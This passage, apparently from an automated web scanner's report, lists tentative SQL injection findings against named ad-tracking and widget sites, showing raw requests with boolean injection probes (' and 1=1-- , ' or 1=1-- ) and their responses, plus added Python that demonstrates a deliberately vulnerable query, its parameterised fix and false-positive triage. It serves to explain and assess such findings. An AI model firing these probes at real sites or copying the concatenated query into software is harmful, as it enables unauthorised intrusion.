Content-Type: application/x-javascript
Set-Cookie: BFF=eJztlL9ygzAMxt%252BFJ%252FAfiINZkpKh3BWXazgunXIZO3ds%252Bu4FG1zZSNCWtat%252F%252BmRJlr%252Bbljv98a55ppOzYGllyjvjhzzPs6R4648VK3oqdVI%252Fm%252Fbx6fXaVeeqTYqbzuQPhAxSCIQHsUZ5EiVqOUvrIVqMgPcgG8%252FBURArEWCIJIaKDZKMDR9Pl7HhnaN7ARp2FALhQaxRnkSJXurLgfe3KwGAtOdIZM74nrMIHB%252FaOZD2HEb6R%252BzCRwx6chTpqQexxj9iB%252BMVSCTwgr85BCm4aKZSYMcWs5ZU1hJRwWcW1EgcpZ85Q%252Bq0GknX6ThSp81J1tmYpXW0FKuzMdQ6Noa6hh6HpfQ16DgGzdI4LMfGMeSklmEaslBMTWIZz3IGo5JI8XAzJZ6WmxLbHabF5Yq4jOHnopmivplSJgnBzCT%252F6oi08ZEe93tLW3Ew2qhWPWmT9WxwmA1GssEvaFtYcYANH%252F3%252FPwf%252F%252BQsW6Edl; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVlEESgyAMRe%252FSEyQBG8CNx%252BjWhYvOdNfunN690FaqCVhcOCjzH%252FkfImMwEOZ7QAonAjtAh4P3nk79GCjM14B9fDqGOMDy%252BlT6LumN0FP%252F%252BVxznLE2Is6B3SodfZVWrz1dptv4mMTazixrSzspBiY%252FZyjGXpXAgl6FsN9CJDjOWBsRRxk7K03FE2E5A%252B7rVQbUB7HOELFW4t0k6AYAKjlzv8zxNentT4%252FeGyZ5kKT2QJMe0CmPdXLrUTZyK3du5ThjbUScQ3fEU2ozKP7Eer%252B3%252Bmr2P1w1u%252BQ4Y4cr4cFEuJ8IK86w6kwSn0pQ3evV2ZjcoYueGNhULylBcgbbiHRlQpPy%252BQJnqYF7; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOwzAMA%252F%252BSF5ByXNvyY4SMmTsW%252FnslBwjaJkA3AUeRt%252Bmqr11ba7lvx43%252BVFZdmAusmGA1ZJoYl74rT1olKKsBYrAUVH5o%252FIJOJWi6oQzqzcMlwEq4Br81rkNjGj88Kv%252BiV%252BNPpyiSgpJuVtMMY4Y5Fccb5iNMAg%253D%253D; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 14:58:00 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

Request 2

GET /load/?p=229'%20and%201%3d2--%20&g=001&c=927073&ag=&gd=&search=recipes&ctg=Entertainment&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D

Response 2

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: TFF=eJyVlE0SgyAMhe%252FiCZKA8uPGY3TrwkVnumt3jncv2BY1AYsLB2XeR96DyOjJ%252BfnpkXxDoAdocXDOUdOPnvx899iHpzUQBvi9LkLfRr1ieuo%252Fn3vOJKyOCHOgj0pLX6WWa0%252B36TG%252BJra2Vb%252B1uZ0YA6OfDrKxdyUwoxch9LcQMc4krI4II4%252BdlKrgiTCfAc%252F1IgPKg9hnCFgtsTYJ2gGAcs7sljm8Rr3e9OicMsQPksQeSNIBWuGxTB498kau5bpaziSsjghzaK94im0G2Z9Y7vdRX8z%252Bhytm55xJ2OVKeDERnifCgjMsOuPE2nEAnz0gA0YVL52NVKkW5HYhT8QrEKqUyxuvl3XA; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOwzAMA%252F%252BSF5ByXNvyY4SMmTsW%252FnslBwjaJkA3AUeRt%252Bmqr11ba7lvx43%252BVFZdmAusmGA1ZJoYl74rT1olKKsBYrAUVH5o%252FIJOJWi6oQzqzcMlwEq4Br81rkNjGj88Kv%252BiV%252BNPpyiSgpJuVtMMY4Y5Fccb5iNMAg%253D%253D; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 14:58:00 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

1.14. http://map.media6degrees.com/orbserv/aopix [acs cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/aopix?pixId=1070&pcv=18&cb=3893481378&topHref=http%3A%2F%2Fwww.orbitcast.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=014020a0g0h1ljtllpxzt1hk8dxzt1hk8dxzt1tzu'%20and%201%3d1--%20; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; clid=2ljtllp01170xrd52zkwjuxh0qypp00g3e020j02502; rdrlst=...[SNIP]...; sglst=20e0s8ndlkb5u2000000063e020j02502719lkb5u2000000063e020j0250256blkb5u2000000063e020j02502ag2lkd7nq07cno0053e020j02502c80lkb5u2000000063e020j02502asulkb5u2000000063e020j02502dgilkb5u2000000063e020j025029q5lkb5u2000000063e020j025024wclkb5u2000000063e020j025020t7ljyxb40ln0a00d3e020j025025mrlkb5u2000000063e020j02502bo0lkb5u2000000063e020j02502aoplkb5u2000000063e020j02502942lkb5u2000000063e020j02502; vstcnt=417k010r044f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1ljtllpxzt1r44txzt1r44txzt1tzu; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44t00h3e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: rdrlst=40p15smlkb5u2000000073e030hsnlkb5u2000000073e0310rdlkdkly000000043e03159olk8fax000000093e030bo8lkb5u2000000073e031196lkkkbe000000023e020lw5lkb5u2000000073e031194lkkjj4000000033e030dlxlkb5u2000000073e030zaalkb5u2000000073e0313bolk7p6z0000000a3e030znmlk34620000000c3e031203lkb5u2000000073e03140rlkb5u2000000073e031192lkkpqi000000013e010p1blkb5u2000000073e03137qlkb5u2000000073e030zr4lkb5u2000000073e030afqlkb5u2000000073e0300bvlk9pe8000000083e0315xylk60qe0000000b3e0310poljyxb40000000e3e0310telkd7nq000000063e030ni1lkb5u2000000073e030c9slk9pe8000000083e03; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: vstcnt=417k010r052te10tq10a24f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:30 GMT

Request 2

GET /orbserv/aopix?pixId=1070&pcv=18&cb=3893481378&topHref=http%3A%2F%2Fwww.orbitcast.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=014020a0g0h1ljtllpxzt1hk8dxzt1hk8dxzt1tzu'%20and%201%3d2--%20; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; clid=2ljtllp01170xrd52zkwjuxh0qypp00g3e020j02502; rdrlst=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; sglst=20e0s8ndlkb5u2000000063e020j02502719lkb5u2000000063e020j0250256blkb5u2000000063e020j02502ag2lkd7nq07cno0053e020j02502c80lkb5u2000000063e020j02502asulkb5u2000000063e020j02502dgilkb5u2000000063e020j025029q5lkb5u2000000063e020j025024wclkb5u2000000063e020j025020t7ljyxb40ln0a00d3e020j025025mrlkb5u2000000063e020j02502bo0lkb5u2000000063e020j02502aoplkb5u2000000063e020j02502942lkb5u2000000063e020j02502; vstcnt=417k010r044f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44u00h3e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: sglst=20e0s8ndlkb5u2000000073e030j03503719lkb5u2000000073e030j0350356blkb5u2000000073e030j03503ag2lkd7nq07i2t0063e030j03503c80lkb5u2000000073e030j03503asulkb5u2000000073e030j03503dgilkb5u2000000073e030j035039q5lkb5u2000000073e030j035034wclkb5u2000000073e030j035030t7ljyxb40lsff00e3e030j035035mrlkb5u2000000073e030j03503bo0lkb5u2000000073e030j03503aoplkb5u2000000073e030j03503942lkb5u2000000073e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: vstcnt=417k010r052te10tq10a24f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:31 GMT
Connection: close

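The issue detail above describes the scanner's boolean test: append ' and 1=1-- and ' and 1=2-- to the original value and compare the two responses. The script below is an added example, not code from the report, the scanner or the scanned site. It uses an in-memory SQLite table constructed for the purpose (table name, rows and cookie values are invented) to show why the pair separates a query built by string concatenation from one that binds the value as a parameter, for both the "and" pair used against the acs cookie and the "or" pair used against the REST URL parameters further down.

```python
"""Why a 1=1 / 1=2 payload pair detects SQL injection, and what the fix
looks like.  Added illustration, not code from the scanned sites or the
scanner; the visitors table, its rows and the lookup values are constructed
for this example.  Standard library only."""
import sqlite3
from typing import Callable, List, Tuple

Lookup = Callable[[sqlite3.Connection, str], List[str]]


def make_db() -> sqlite3.Connection:
    # Constructed fixture: tracking-cookie value -> audience segment.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitors (acs TEXT PRIMARY KEY, segment TEXT)")
    conn.executemany(
        "INSERT INTO visitors VALUES (?, ?)",
        [("014020a0g0h1", "news"), ("7f3k2", "finance")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, acs: str) -> List[str]:
    # The cookie value is pasted into the SQL text: a quote in it closes
    # the string literal and whatever follows is parsed as SQL.
    sql = "SELECT segment FROM visitors WHERE acs = '" + acs + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, acs: str) -> List[str]:
    # Bound parameter: the value travels separately from the statement and
    # can only ever be compared as a string, quote and all.
    rows = conn.execute("SELECT segment FROM visitors WHERE acs = ?", (acs,))
    return [row[0] for row in rows]


def differential(lookup: Lookup, conn: sqlite3.Connection, base: str,
                 connector: str = "and") -> Tuple[List[str], List[str]]:
    """Submit the scanner's pair (base + ' <and|or> 1=1-- ' and the same
    with 1=2) and return what each lookup yields."""
    true_rows = lookup(conn, f"{base}' {connector} 1=1-- ")
    false_rows = lookup(conn, f"{base}' {connector} 1=2-- ")
    return true_rows, false_rows


def looks_injectable(lookup: Lookup, conn: sqlite3.Connection, base: str,
                     connector: str = "and") -> bool:
    """The scanner's decision rule: any difference between the two results
    is reported as injection."""
    true_rows, false_rows = differential(lookup, conn, base, connector)
    return true_rows != false_rows


if __name__ == "__main__":
    db = make_db()
    # Vulnerable, and-pair: 1=1 keeps the original row, 1=2 drops it.
    print("vulnerable and-pair:", differential(lookup_vulnerable, db, "014020a0g0h1"))
    # Vulnerable, or-pair: 1=1 returns every row whatever the base value is.
    print("vulnerable or-pair: ", differential(lookup_vulnerable, db, "14286747", "or"))
    # Safe: both payloads are looked up as literal strings and match nothing.
    print("safe and-pair:      ", differential(lookup_safe, db, "014020a0g0h1"))
```

The trailing space after the comment marker matters: the payload ends in -- followed by a space, so the closing quote the application appends is swallowed by the comment. With the parameterised lookup the quote never reaches the parser, which is the whole fix; input filtering on the cookie value is not a substitute.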

1.15. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14286747'%20or%201%3d1--%20 and 14286747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the difference has a simpler explanation than SQL: Response 1, to the ' or 1=1-- payload, is a bare Apache 403 (Server: Apache, no X-Powered-By header, the default iso-8859-1 error page), so that request appears to have been refused by the web server before it reached the application, while Response 2, to the ' or 1=2-- payload, comes from the Rails application behind Phusion Passenger. Two responses produced by different tiers say nothing about how the application treats the two payloads. The same pattern recurs in 1.16 to 1.21 below.

Request 1

GET /widgets14286747'%20or%201%3d1--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:45:47 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets14286747' or 1=1-- /multiwidget3/TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets14286747'%20or%201%3d2--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02577
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:45:48 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets14286747' or 1=2-- /multiwidget3/TA/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['ho
...[SNIP]...
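
Manual review of a pair like the one above, or the two 302s under 1.14, turns on a handful of headers rather than on the page bodies. The script below is an added example, not part of the report or of the scanner, that parses two raw responses and sorts the pair into one of four buckets. The sample responses are trimmed copies of the headers shown under 1.14 and 1.15 with short stand-in bodies; the bucket names and the header lists are this example's own choices.

```python
"""Triage for difference-based SQL injection findings: does a 1=1 / 1=2
response pair differ because of the application, or for a duller reason?
Added example, not part of the original report or of the scanner.  The
sample responses are constructed from the headers shown in issues 1.14 and
1.15, trimmed to the lines that matter, with stand-in bodies."""
from dataclasses import dataclass
from typing import Dict, List

# Headers that differ between any two requests and carry no signal.
VOLATILE = {"date", "connection", "x-runtime", "content-length", "etag", "expires"}
# Headers that reveal which tier (web server or application) answered.
TIER = ("server", "x-powered-by", "content-type")


@dataclass
class Response:
    status: int
    headers: Dict[str, List[str]]  # lower-cased name -> values, in order
    body: str


def parse_response(raw: str) -> Response:
    """Split a raw HTTP/1.1 response (LF line endings) into its parts."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    status = int(lines[0].split()[1])
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return Response(status, headers, body)


def _tier(r: Response) -> tuple:
    return tuple(r.headers.get(h) for h in TIER)


def _stable(r: Response) -> Dict[str, List[str]]:
    return {h: v for h, v in r.headers.items()
            if h not in VOLATILE and h != "set-cookie"}


def triage(true_resp: Response, false_resp: Response) -> str:
    """'blocked-upstream': one request got a 403 from a different tier than
    the other answered from, so the two never reached the same code path.
    'needs-review': status, body or a meaningful header differs.
    'cookie-only': identical apart from Set-Cookie; read what was set.
    'identical': nothing differs beyond volatile headers."""
    if 403 in (true_resp.status, false_resp.status) and _tier(true_resp) != _tier(false_resp):
        return "blocked-upstream"
    if (true_resp.status != false_resp.status or true_resp.body != false_resp.body
            or _stable(true_resp) != _stable(false_resp)):
        return "needs-review"
    if true_resp.headers.get("set-cookie") != false_resp.headers.get("set-cookie"):
        return "cookie-only"
    return "identical"


# Constructed from issue 1.14 (acs cookie): two 302s to the same Location.
ACS_TRUE = """HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: acs=014020a0g0h1ljtllpxzt1r44txzt1r44txzt1tzu; Domain=media6degrees.com; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44t00h3e030j03503; Domain=media6degrees.com; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:30 GMT

"""
ACS_FALSE = """HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44u00h3e030j03503; Domain=media6degrees.com; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:31 GMT
Connection: close

"""
# Constructed from issue 1.15 (REST URL parameter 1): Apache 403 vs Rails 404.
REST_TRUE = """HTTP/1.1 403 Forbidden
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:45:47 GMT
Connection: close
Content-Length: 252

<html><head><title>403 Forbidden</title></head><body>stand-in</body></html>
"""
REST_FALSE = """HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02577
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:45:48 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html><html lang="en"><head><title>stand-in</title></head></html>
"""

if __name__ == "__main__":
    print("1.14 acs cookie:      ", triage(parse_response(ACS_TRUE), parse_response(ACS_FALSE)))
    print("1.15 REST parameter 1:", triage(parse_response(REST_TRUE), parse_response(REST_FALSE)))
```

Only 'needs-review' is worth a confirmation attempt; for a 'blocked-upstream' pair the right next step is to resend the 1=1 payload in a form the front end lets through (or to test the 1=2 payload against an unmodified value) so that both sides of the comparison come from the application.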

1.16. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20680832'%20or%201%3d1--%20 and 20680832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The responses follow the pattern noted under 1.15: a bare Apache 403 without application headers for the 1=1 payload, and the Passenger-hosted application's 404 page for the 1=2 payload, so the two requests were not handled by the same code.

Request 1

GET /widgets/multiwidget320680832'%20or%201%3d1--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:10 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget320680832' or 1=1-- /TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget320680832'%20or%201%3d2--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:10 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget320680832' or 1=2-- /TA/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
